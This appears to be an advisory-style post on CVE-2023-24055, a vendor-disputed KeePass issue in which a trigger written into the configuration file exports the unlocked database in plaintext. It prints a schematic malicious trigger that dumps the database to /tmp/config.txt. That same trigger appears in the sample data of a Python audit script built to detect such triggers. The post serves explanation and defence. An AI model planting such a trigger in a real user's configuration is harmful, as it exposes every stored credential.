
Summary

CVE-2023-24055 describes a reported weakness in KeePass through version 2.53: in a default installation, an attacker with write access to KeePass's XML configuration file can add an export trigger and thereby obtain the stored passwords in cleartext the next time the user unlocks the database. The KeePass vendor disputes the report, stating that the database is not intended to be secure against an attacker who already has that level of access to the local PC. This post walks through the disputed issue and shows a trigger snippet that illustrates the attack.

Exploit Details

KeePass is a widely used password manager that stores credentials in an encrypted database (.kdbx) protected by a master key. Its trigger system lets users attach actions to application events, and trigger definitions are stored in the XML configuration file; in a default (installed, non-portable) setup the per-user copy is KeePass.config.xml under %APPDATA%\KeePass, a path the user's own account can write. Because triggers run inside KeePass after the user has unlocked the database, an attacker who can edit that file never has to attack the encryption: they add a trigger that exports the already-decrypted database, for example with a snippet of this shape:

<TriggerCollection>
    <Trigger>
        <Name>Export on Open</Name>
        <Events>
            <Event>OpenedDatabaseFile</Event>
        </Events>
        <Actions>
            <Action>
                <Type>ExecuteCommandLineXsl</Type>
                <Parameters>
                    <Parameter>cmd://tee /tmp/config.txt %{APPDIR}/XSL/PlainText.xsl</Parameter>
                </Parameters>
            </Action>
        </Actions>
    </Trigger>
</TriggerCollection>

The snippet is schematic. The event OpenedDatabaseFile stands for KeePass's "Opened database file" trigger event, and the action stands for an export of the open database through a plain-text XSL transform (KeePass ships an XSL/ directory with such stylesheets and provides an "Export active database" trigger action). In a real KeePass.config.xml, events and actions are identified by GUIDs and carry their own <Parameters> elements, so a working trigger would be produced through the Tools > Triggers dialog, or by pasting a genuine exported trigger, rather than by hand-writing type names. The effect is the same either way: each time the victim opens the database, its contents are written in plaintext to a location of the attacker's choosing (/tmp/config.txt in the example) without further user interaction and without the attacker ever needing the master key.
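As an added audit example (this is not KeePass's own code, nor the original proof of concept), the following Python parses a KeePass.config.xml, flags triggers whose actions export data or run a command line once a database has been opened, and computes whether the trigger system is effectively enabled given an optional KeePass.config.enforced.xml. Both sample configuration files are constructed for the example and use the simplified trigger form shown above; real configurations identify event and action types by GUID, which the check tolerates because it inspects all text beneath each action rather than a type name. The Application/TriggerSystem/Enabled element path is an assumption taken from KeePass's enforced-configuration examples and should be verified against the deployed version.

```python
"""Added audit example (not KeePass code): flag exfiltrating triggers in a
KeePass.config.xml and compute the effective trigger-system state."""
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample user config in the simplified trigger form shown on this
# page. Real configs identify event/action types by GUID; the checks below
# look at all text under each element and search by tag name at any depth,
# so neither the type names nor the exact nesting are relied on.
USER_CONFIG = """
<Configuration>
  <Application>
    <TriggerSystem>
      <Enabled>true</Enabled>
      <Triggers>
        <Trigger>
          <Name>Notify on save</Name>
          <Events><Event>SavedDatabaseFile</Event></Events>
          <Actions><Action><Type>ShowMessageBox</Type>
            <Parameters><Parameter>Database saved.</Parameter></Parameters>
          </Action></Actions>
        </Trigger>
        <Trigger>
          <Name>Export on Open</Name>
          <Events><Event>OpenedDatabaseFile</Event></Events>
          <Actions><Action><Type>ExecuteCommandLineXsl</Type>
            <Parameters>
              <Parameter>cmd://tee /tmp/config.txt %{APPDIR}/XSL/PlainText.xsl</Parameter>
            </Parameters>
          </Action></Actions>
        </Trigger>
      </Triggers>
    </TriggerSystem>
  </Application>
</Configuration>
"""

# Constructed KeePass.config.enforced.xml that switches triggers off. The
# Application/TriggerSystem/Enabled path follows KeePass's enforced-config
# examples (assumption: verify against the version you deploy).
ENFORCED_CONFIG = """
<Configuration>
  <Application>
    <TriggerSystem><Enabled>false</Enabled></TriggerSystem>
  </Application>
</Configuration>
"""

# Text fragments that indicate data leaving KeePass (export, command line,
# XSL transform) and events that only fire once the database is unlocked.
EXFIL_MARKERS = ("export", "cmd://", "xsl", "executecommandline")
POST_UNLOCK_EVENTS = ("openeddatabasefile", "saveddatabasefile")


@dataclass
class Finding:
    name: str
    events: List[str]
    reasons: List[str] = field(default_factory=list)


def _all_text(elem: ET.Element) -> str:
    """All text beneath an element, so GUIDs and parameters are both seen."""
    return " ".join(t.strip() for t in elem.itertext() if t.strip())


def audit_triggers(xml_text: str) -> List[Finding]:
    """One Finding per trigger whose actions could leak database contents."""
    findings = []
    for trig in ET.fromstring(xml_text).iter("Trigger"):
        events = [_all_text(e) for e in trig.iter("Event")]
        reasons = []
        for action in trig.iter("Action"):
            blob = _all_text(action).lower()
            hits = [m for m in EXFIL_MARKERS if m in blob]
            if hits:
                reasons.append(f"action text matches {hits}")
        if reasons and any(e.lower() in POST_UNLOCK_EVENTS for e in events):
            reasons.append("fires after the database is unlocked")
        if reasons:
            findings.append(Finding((trig.findtext("Name") or "").strip(),
                                    events, reasons))
    return findings


def triggers_enabled(user_xml: str, enforced_xml: Optional[str] = None) -> bool:
    """Effective trigger-system state: the enforced config, if any, wins."""
    for src in (enforced_xml, user_xml):
        if src is None:
            continue
        val = ET.fromstring(src).findtext("./Application/TriggerSystem/Enabled")
        if val is not None:
            return val.strip().lower() != "false"
    return True  # KeePass default: trigger system on
```

Run audit_triggers on the contents of the user's KeePass.config.xml: the benign "Notify on save" trigger produces nothing, while the "Export on Open" trigger is reported with the matched markers and the note that it fires after unlock. Pair it with triggers_enabled(user_xml, enforced_xml) so that a deployment which disables the trigger system through the enforced configuration is not flagged for triggers that can never run.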

Vendor's Position

The KeePass vendor disputes that this is a vulnerability. Their position is that the password database is not designed to be secure against an attacker who already has write access to the user's files on the local PC. The reasoning is that an attacker with that foothold has other routes to the same result (a modified binary, a keylogger, reading process memory), so a check inside KeePass would not change the outcome; protecting the machine from unauthorized local access is the job of the operating system and its access controls, not of the password manager.

Potential Impact

If the report holds, an attacker who can write the configuration file obtains the complete contents of the database in cleartext the next time the victim unlocks it, without ever attacking the KDBX encryption or learning the master key: the export runs in the victim's own KeePass session, on data that is already decrypted. The precondition is significant (write access to the victim's profile), but where it is met, the password manager's encryption offers no protection against this path.

References

- Original CVE report: CVE-2023-24055 (https://nvd.nist.gov/vuln/detail/CVE-2023-24055)
- KeePass trigger documentation: KeePass Triggers (https://keepass.info/help/v2/triggers.html)
- More about KeePass: KeePass Password Safe (https://keepass.info/)

Conclusion

The issue described by CVE-2023-24055 for KeePass up to version 2.53 remains disputed by the vendor, but the practical lesson stands regardless: a password manager cannot protect a database on a machine the attacker already controls, so the defenses belong at the system level. Concretely: restrict who can write to KeePass's configuration file and program directory; if triggers are not needed, disable the trigger system through an enforced configuration (KeePass.config.enforced.xml in the application directory, whose settings override the user's configuration); and monitor the configuration file for unexpected changes, treating a new trigger that fires when a database is opened as an incident. Sound access control on the endpoint is the control that actually guards the database.

Timeline

Published on: 01/22/2023 04:15:00 UTC
Last modified on: 02/02/2023 00:15:00 UTC